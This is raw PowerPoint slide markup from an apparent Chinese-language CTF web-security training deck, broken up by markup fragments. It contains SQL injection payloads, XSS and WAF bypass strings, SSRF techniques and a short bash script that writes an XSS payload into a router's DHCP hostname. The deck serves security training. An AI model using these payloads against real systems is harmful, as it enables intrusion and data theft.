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80" r:id="rId13"/>
    <p:sldId id="281" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="273" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="274" r:id="rId22"/>
    <p:sldId id="275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FC986-2B06-074A-AA25-60C9AD9FFB3C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/1/16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78706-CC01-224B-895A-5DA993F8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7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78706-CC01-224B-895A-5DA993F819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4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一般不会出这种题目，毕竟对服务器的要求太高，爆破不当，很容易搞死服务器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78706-CC01-224B-895A-5DA993F819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3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类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03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extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>函数也是MYSQL对XML文档数据进行查询和修改的XPATH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(1,concat(0x7e,database())) or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>name_const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MYSQL5.0.12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本加入的一个返回给定值的函数。当用来产生一个结果集合列时 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, NAME_CONST() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>促使该列使用给定名称。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or (SELECT * FROM (SELECT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>name_const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(version(),1)),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>name_const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(version(),1))a) or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注意，高版本的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能获取表信息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3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前端脚本类</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" alt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Js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>解密，一般是各种奇葩的编码格式，扔进</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>里运行即可</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>例如 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6" y="2538709"/>
            <a:ext cx="12192000" cy="163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配合一些小的对称加密算法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5729" y="2016125"/>
            <a:ext cx="5954866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1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998" y="804519"/>
            <a:ext cx="6565900" cy="477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6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Xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>案例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Tp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-link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tenda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 路由器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#!/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GREEN=$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setaf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2 &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bold)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BLUE=$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setaf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 6 &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bold) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo $BLUE"[+] Persistent XSS DHCP Exploiter via Routers"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo $GREEN"[+] Vulnerability founded by : Lawrence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Amer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> " </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo -n $BLUE"[~] type XSS Payload here :"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>read -e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/hostname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo $GREEN"[+]DHCP HOST NAME IS WRITTEN"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过滤了最常用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>换用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等其他标签</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;&lt;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=1" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=alert(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss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waf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般只是简单的正则匹配，所以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jsfuck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实体编码即可绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>浏览器的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绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1"/>
              <a:t>正则表达式大概是这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1"/>
              <a:t>onerror|onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>|...)+[\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>]=+[\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>].+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使用特殊字符编码绕过之，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>ISO-2022-JP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dirty="0"/>
              <a:t>"&gt;&lt;meta%20charset="ISO-2022-JP"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/onload%1B%28B=alert(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>二次编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;&lt;script&gt;alert(1);2%2502&lt;script&lt;/script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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多看看浏览器相关漏洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-C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03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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞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可以利用存在缺陷的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用作为代理攻击远程和本地的服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>banner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议读取本地文件等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4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先通过读取文件，读取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/hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件，检查域名和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绑定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>再通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ssrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>读取远程服务器网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般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题目的思路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1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MISC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>杂项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的开发者模式，检查一下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头</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以试试修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>x-forward-for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>去绕过指定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地址登陆的限制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改浏览器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>user-agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>头</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>伪造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Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入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Insert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型注入，绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>waf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>其他各种变态的注入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对于前端限制的内容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果断使用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的开发者工具修改</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对于不能输入的地方，检查一下是否元素被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>disable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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>suit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，从中修改数据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伪造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tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>未删除默认的演示网站，从而可以自己修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网站配置错误，导致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的文件打开，从而伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session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03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当然了，还有老生常谈的弱口令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爆破</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>弱口令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>爆破目录，有肯能发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的用户名和密码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5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类题目常与代码审计题目出现在一起，也就是说大部分都需要代码审计</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握常见的那几种漏洞类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>思路灵活一下，不会的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要学会写脚本，毕竟有些地方真得需要脚本去跑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 err="1"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1"/>
              <a:t>www.atomsec.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1"/>
              <a:t>ctf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN"/>
              <a:t>/idf-ctf%E8%AE%AD%E7%BB%83%E8%90%A5%E4%B9%8B%E4%B8%8D%E9%9A%BE%E4%B8%8D%E6%98%93%E7%9A%84js%E5%8A%A0%E5%AF%86/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7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如何注入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绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>waf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报错（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注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>型二次注入（之前代码审计所分析的例子）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>二次编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>添加无用注释</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>False SQL Injection and Advanced Blind SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如有情况，分析其代码，找出策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等等。。。。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0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False SQL Injection and Advanced Blind SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>高级盲注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一般的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防火墙只过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#, --, /**/,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>因此该方法在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防火墙中更有效。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串字段为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的情况下，返回结果始终为真。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果你在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，所有内容都将被显示。这就是假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入的原理。无论如何，结果为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（真）将使得登录成功。为了使结果为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（真），你需要一些东西处理整数，如使用位操作和算术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>运算</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>‘|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" smtClean="0"/>
              <a:t>’&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>‘&lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="mr-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="uk-UA" dirty="0"/>
          </a:p>
          <a:p>
